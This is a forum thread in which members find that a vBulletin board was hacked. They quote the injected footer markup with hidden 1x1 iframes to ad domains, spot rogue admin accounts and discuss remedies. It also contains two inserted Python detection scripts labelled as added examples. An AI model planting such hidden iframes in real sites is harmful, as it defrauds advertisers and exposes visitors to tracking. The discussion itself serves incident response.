-
Strange Connections
I'm probably about to embarrass myself again, but the board is doing something which to my non-expert eye seems strange.
When I just logged on, the board made various quick connections to and from sites such as googleleads, doubleclick, contextweb, adnxs and others. Those are advertising/tracking sites. It seems a fair assumption that the board was sending them my IP. Sites such as these build profiles of individuals' browsing habits to sell them. I don't log in that often, but this has happened the last couple of times I did.
In addition, just now and the last time I logged in McAfee blocked a connection the board attempted to make to an IP it deemed unsafe, 216.38.163.167. This resolves to something called "Mirror Image". I'm not sure either why McAfee thinks it unsafe or why the board attempted the connection, but thought I'd relate it.
You guys know about this?
"A wise man proportions belief to the evidence."
- David Hume
-
Re: Strange Connections
Your concerns are not strange at all, Wes.
I'm not sure why McAfee is blocking mirror-image.com. My security software is not.
mirror-image.com is a completely reputable Content Delivery Network, essential for the smooth operating of many websites
Mirror Image Internet is more than just a Content Delivery Network (CDN). Our patented, global Dynamic Delivery Network (DDN) solutions leverage the unlimited capacity of our global Content Access Point® (CAP) network to guarantee availability and unsurpassed performance—even during peak traffic periods
FYI, many of the connections are to graphics members have included in posts. The forum links to the graphics source and retrieves the image every time someone attempts to view it.
This is one of the reasons many forums discourage the use of linked graphics. Such linking consumes bandwidth and server capacity and can lead to graphic-heavy pages loading slowly (as happens in any of the graphic-heavy posts in the cash gifting subforum here on REALSCAM.com).
As I post, the forum is linking to:
ajaxgoogleapis.com
ajax.googleapis.com is a CDN repository for the popular jQuery JavaScript functionality plus others that modern websites utilise. If you block this then you will stop the website functioning as it was designed to work.
damnxd.com
We are the best Funny Pics website on the web. We update our site everyday with hundreds of new funny pics.
jobless-jack.com
Jobless Jack | MEME | TROLLS | CLOSE ENOUGH | FUNN
weirdstuffs.com
BBM Display Pictures | Facebook Covers | Jokes
Facebook.com
Google.com
I would encourage anyone using Firefox who is concerned with cross-site requests to install the Request Policy Firefox addon
RequestPolicy is an extension for Mozilla browsers that increases your browsing privacy, security, and speed by giving you control over cross-site requests.
The only thing necessary for the triumph of evil is for good men to do nothing
-
Re: Strange Connections
lijit.com, w55c.net, c3tag.com, burstnet.com and several more. And all of these sites are leaving tracking cookies - I just checked. I normally use Firefox, so I just fired up Chrome - same connections.
I agree that I don't know why McAfee is suspicious of Mirror Image. And I agree that the connections you listed simply serve to retrieve legitimate content. But all of the sites (other than Mirror Image) I listed are in the tracking and selling business. This is not the worst thing in the world, but other sites don't do it.
Thanks for your reply, LRM, but I still think it's strange.
"A wise man proportions belief to the evidence."
- David Hume
-
-
Re: Strange Connections
That's strange, Wes.
I'm not getting any of those tracking cookie requests, nor do I have any of them showing in my cookie folder.
We'll check it out.
Thanks for the info
The only thing necessary for the triumph of evil is for good men to do nothing
-
Re: Strange Connections
I had an 'ad.yieldmanager' popup on my phone from here the other day.
-
Re: Strange Connections
OK, I have had this happen twice: ads have started to play on my computer, almost like a video ad. As soon as I shut down the site, the ad stops. Happened yesterday and just a second ago.
-
Re: Strange Connections
It's continuing for me as well. If it helps, a few more connections: hiroserver.com, invitemedia.com, dotomi.com, advertising/tracking sites all. And there are more. I don't think any of these are dangerous, but why is the board doing that?
"A wise man proportions belief to the evidence."
- David Hume
-
Re: Strange Connections
I've also been seeing a barrage of unfamiliar sites loading when I visit the Realscam homepage.
Could something have slipped past Jason and gotten embedded? Or another 1-pixel graphic like MMB pulled on us a while back?
On the other hand, I don't get the video ad popup, probably due to how my system is set up.
-
Re: Strange Connections
A while back I kept seeing embedded links in posts and I assumed it was the site. After some investigation it turned out my computer was infected. I was the only one at that time seeing the live links popping up all over the place.
As for the issues several of you are experiencing I am not seeing anything. I will alert Jason and Glim. The owner has been tied up but will be checking it out as well. All this does make me miss the simple times and my dial phone just a wee bit!
-
-
Re: Strange Connections
Originally Posted by
Soapboxmom
All this does make me miss the simple times and my dial phone just a wee bit!
I was never alive for the simple times, but I feel ya.
-
Re: Strange Connections
There is definitely something wrong: on a dry run, accessing forum.php launches a rollercoaster of cookies from other sites, and it looks like they all originated first from jobless-jack.com and damnxd.org (and this is on a page which does not have any non-stock images).
RS_cookies.jpg
Jason, what is the purpose of having these iframe lines included in forum.php?
Code:
<div id="footer_morecopyright" class="shade footer_morecopyright">
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
<br/><br/><iframe src="http://damnxd.org/dns.html" width="1" height="1"></iframe><br/><iframe src="http://www.jobless-jack.com/" width="1" height="1"></iframe><br/>
</div>
The comment about "do not remove" looks very fishy to me
Last edited by NikSam; 09-06-2013 at 09:47 AM.
-
-
Re: Strange Connections
The same thing is happening from my office computer.
"A wise man proportions belief to the evidence."
- David Hume
-
Re: Strange Connections
Originally Posted by
NikSam
There is definitely something wrong: on a dry run, accessing forum.php launches a rollercoaster of cookies from other sites, and it looks like they all originated first from jobless-jack.com and damnxd.org (and this is on a page which does not have any non-stock images).
RS_cookies.jpg
Jason, what is the purpose of having these iframe lines included in forum.php?
Code:
<div id="footer_morecopyright" class="shade footer_morecopyright">
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
<br/><br/><iframe src="http://damnxd.org/dns.html" width="1" height="1"></iframe><br/><iframe src="http://www.jobless-jack.com/" width="1" height="1"></iframe><br/>
</div>
The comment about "do not remove" looks very fishy to me
Have been occupied with moving to a new place but I reported it to SBM the other day when I started getting all these weird links popping up. I am mainly using Chrome now and it does not happen on any other sites that I visit. As of 9/11/2013, it is still happening when I login to RS.
Don't get ripped off!! Stay informed!
-
Re: Strange Connections
I don't automatically accept cookies, so I got to see these, which were asked to be set when I tried to access this site from a different computer:
widget3.linkwithin.com
widget5.linkwithin.com
widget6.linkwithin.com
jobless-jack.com
damnxd.org
whos.amung.us
rc.rlcdn.com
lb.adnxs.com
idsync.rlcdn.com
-
Re: Strange Connections
So, is anybody gonna remove that infected HTML code?
As the VB original template shows:
Code:
<div id="footer_morecopyright" class="shade footer_morecopyright">
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
{vb:raw cronimage}
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
{vb:raw vboptions.copyrighttext}
</div>
Those infectious iframes are more likely coming from the vboptions.copyrighttext variable,
resulting in:
Code:
<div id="footer_morecopyright" class="shade footer_morecopyright">
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
<br/><br/><iframe src="http://damnxd.org/dns.html" width="1" height="1"></iframe><br/><iframe src="http://www.jobless-jack.com/" width="1" height="1"></iframe><br/>
</div>
Please verify that this code was put by someone in AdminCP > Settings > Options > Site Name / URL / Contact Details > Copyright Text
And change admin passwords. (might also have come from penetrating MySQL db)
Last edited by NikSam; 09-13-2013 at 06:24 AM.
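A quick way to check a rendered page for exactly the kind of injection NikSam describes (tiny or invisible iframes pointing at hosts the site does not own). This is an added example, not code from the forum or from vBulletin; it uses only the Python standard library. The sample HTML is constructed from the footer snippet quoted above plus one normal-sized first-party frame for contrast, and the first-party host list is an assumption for illustration.

```python
"""Flag hidden third-party iframes in a page's rendered HTML.

Added example, not the forum's or vBulletin's own code.  An <iframe> is
reported when its frame is too small to see (width or height of 1px or
less), when it is hidden via inline CSS, or when its src host is not on
the site's own allow-list.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the injected footer as quoted in the thread, plus a
# normal-sized first-party frame that should NOT be reported.
SAMPLE_FOOTER = """
<div id="footer_morecopyright" class="shade footer_morecopyright">
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
<br/><br/><iframe src="http://damnxd.org/dns.html" width="1" height="1"></iframe><br/><iframe src="http://www.jobless-jack.com/" width="1" height="1"></iframe><br/>
<iframe src="https://www.realscam.com/help.php" width="600" height="400"></iframe>
</div>
"""

# Assumed allow-list: hosts the site itself legitimately serves from.
FIRST_PARTY_HOSTS = {"realscam.com", "www.realscam.com"}


def _as_int(value):
    """Parse a width/height attribute; None when absent or not a number."""
    try:
        return int(str(value).strip().rstrip("px"))
    except (TypeError, ValueError):
        return None


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))


def find_suspicious_iframes(html, first_party_hosts):
    """Return a list of {src, host, reasons} for each iframe worth a look."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        host = urlparse(src).hostname or ""
        width = _as_int(attrs.get("width"))
        height = _as_int(attrs.get("height"))
        style = (attrs.get("style") or "").replace(" ", "").lower()
        reasons = []
        if (width is not None and width <= 1) or (height is not None and height <= 1):
            reasons.append("tiny frame (<=1px)")
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden via CSS")
        if host and host not in first_party_hosts:
            reasons.append(f"third-party host {host}")
        if reasons:
            findings.append({"src": src, "host": host, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_iframes(SAMPLE_FOOTER, FIRST_PARTY_HOSTS):
        print(f["src"], "->", "; ".join(f["reasons"]))
```

Run it against the saved source of forum.php (or any page) instead of SAMPLE_FOOTER; a clean page should produce no findings, and anything flagged as both "tiny frame" and "third-party host" is a strong sign of injected content rather than an embedded image a member posted.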
-
Re: Strange Connections
UPDATE: It seems to be a VB exploit, so make sure to install the latest fixes so it doesn't happen again after removal of the Copyright Text;
check for suspicious new admin accounts, php files which did not come from the stock vBulletin setup, and modifications to stock php files.
https://forums.digitalpoint.com/thre...erted.2679354/
To remove the Copyright Text, as pointed out there:
You should be able to go into your options and edit the copyrighttext field. I think it might be hidden, so you will need to be in debug mode to see it in there.
more details on the exploit: http://www.vbulletin.com/forum/forum...-1-vbulletin-5
Last edited by NikSam; 09-13-2013 at 06:49 AM.
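The "php files which did not come from the stock setup, and modifications to stock php files" check above is easiest when you have a clean copy of the same vBulletin version to hash against. The following is an added example (not vBulletin's own tooling): it hashes every .php file under two trees and reports what was added, changed or removed in the deployed copy. The sample trees are constructed in a temporary directory; the file names and contents in them are made up for illustration.

```python
"""Compare a deployed install tree against a stock copy by file hash.

Added example, not vBulletin's own code.  hash_tree() maps each .php file
to its sha256; compare_to_manifest() diffs two such maps.  In practice the
"stock" map would be built once from a freshly unpacked copy of the same
version and saved, then compared against the live tree after an incident.
"""
import hashlib
import os
import tempfile


def sha256_of(path):
    """Stream a file through sha256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root, extensions=(".php",)):
    """Map every matching file under root (relative, '/'-separated) to its hash."""
    result = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(extensions):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            result[rel] = sha256_of(full)
    return result


def compare_to_manifest(stock, deployed):
    """Return sorted lists of added, modified and removed paths."""
    added = sorted(set(deployed) - set(stock))
    removed = sorted(set(stock) - set(deployed))
    modified = sorted(p for p in set(stock) & set(deployed) if stock[p] != deployed[p])
    return {"added": added, "modified": modified, "removed": removed}


def build_sample_trees():
    """Constructed sample: a 'stock' tree and a 'deployed' tree with one edited
    file, one dropped-in file, and an install directory left behind."""
    base = tempfile.mkdtemp()
    stock = os.path.join(base, "stock")
    deployed = os.path.join(base, "deployed")
    files = {  # made-up contents standing in for real vBulletin files
        "forum.php": "<?php // stock forum entry point\n",
        "includes/class_core.php": "<?php // stock core\n",
    }
    for root in (stock, deployed):
        for rel, body in files.items():
            p = os.path.join(root, rel)
            os.makedirs(os.path.dirname(p), exist_ok=True)
            with open(p, "w") as fh:
                fh.write(body)
    # Differences in the deployed copy (all constructed for the example).
    with open(os.path.join(deployed, "forum.php"), "a") as fh:
        fh.write("// unexpected trailing code\n")
    with open(os.path.join(deployed, "includes", "x.php"), "w") as fh:
        fh.write("<?php // not in stock\n")
    os.makedirs(os.path.join(deployed, "install"))
    with open(os.path.join(deployed, "install", "upgrade.php"), "w") as fh:
        fh.write("<?php // installer left behind\n")
    return stock, deployed


def run_check():
    """Build the sample trees and diff them."""
    stock_dir, deployed_dir = build_sample_trees()
    return compare_to_manifest(hash_tree(stock_dir), hash_tree(deployed_dir))


if __name__ == "__main__":
    for kind, paths in run_check().items():
        print(f"{kind}: {paths}")
```

Anything under "added" deserves a look first (a dropped-in .php file or a leftover install directory), then "modified"; the hash comparison says nothing about the database, so the Copyright Text setting and the admin user list still have to be reviewed separately.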
-
Re: Strange Connections
Thanks for the info. We will get the owner on it this weekend.
-
Re: Strange Connections
See the PC World article as well. Especially this part:
It’s not clear what the exploit currently being investigated would allow potential attackers to do, but the fact that it prompted an advance warning from the developers suggests that it might have serious implications.
Luke [vBulletin tech guru - WS] declined to disclose information about the nature of the exploit.
I don't like that. I suggest that users must view their passwords to this site as compromised - if you use your RS password for anything else that matters to you, you ought to change the others. Now.
And why on God's green earth would anyone not delete the install directory? I think I recall that phpBB (which Quatloos runs on) won't even start until the install directory is gone.
I would even consider shutting down the board until this is fixed.
"A wise man proportions belief to the evidence."
- David Hume
-
Re: Strange Connections
Originally Posted by
wserra
... I suggest that users must view their passwords to this site as compromised ...
Passwords in VB are stored as hashes, so if it is not a dictionary word, short, or easy to brute force, it is not likely to be compromised.
But I agree: as a general rule never use the same password for different sites; get a password management program if you must,
or at least come up with a scheme to generate passwords for sites (like for GMail - mypass_gm).
The most critical password a person has is to their email; even if you think there is nothing there worth reading for someone, it can be used
to reset your passwords on other sites (banks, PayPal, etc.).
-
Re: Strange Connections
Originally Posted by
NikSam
Passwords in VB are stored as hashes, so if it is not dictionary word, short, easy to brute force not likely will be compromised.
So were the passwords in ubuntuforums.org, also running VB, hacked a couple of months ago (perhaps in part by the same exploit). Nonetheless, IIRC, the Ubuntu folks advised everyone to change passwords, especially if used on other sites. No?
"A wise man proportions belief to the evidence."
- David Hume
-
Re: Strange Connections
OK, I already spotted newly created Administrators:
View Profile: .
View Profile: sky22
-
Re: Strange Connections
Originally Posted by
NikSam
Both created last week.
Dum-da-DUM-DUM.
"A wise man proportions belief to the evidence."
- David Hume
-
Re: Strange Connections
Would someone update the non-techy users as to what this means and a course of action? I am running AVG Internet Security, and recently added Malwarebytes at the suggestion of another forum member. So far my scans come back clean, but I have no idea what any of this means behind the scenes.
-
Re: Strange Connections
Ribshaw, your protections are only good for your own PC.
RS itself has been compromised/hacked/penetrated by exploiting
a programming mistake in the vBulletin software on which this forum runs.
Whoever put those hidden iframes in is just generating views for their ads, even though you cannot see those ads (they are hidden in two 1x1 frames at the bottom which are invisible).
But since the vulnerability is not addressed, anybody else can repeat the hack for other purposes, and perhaps already did too.
They can steal the database of users, install additional backdoors, modify content, etc...
-
-
Re: Strange Connections
Think of it as RS having gained two new admins from the Russian mob.
"A wise man proportions belief to the evidence."
- David Hume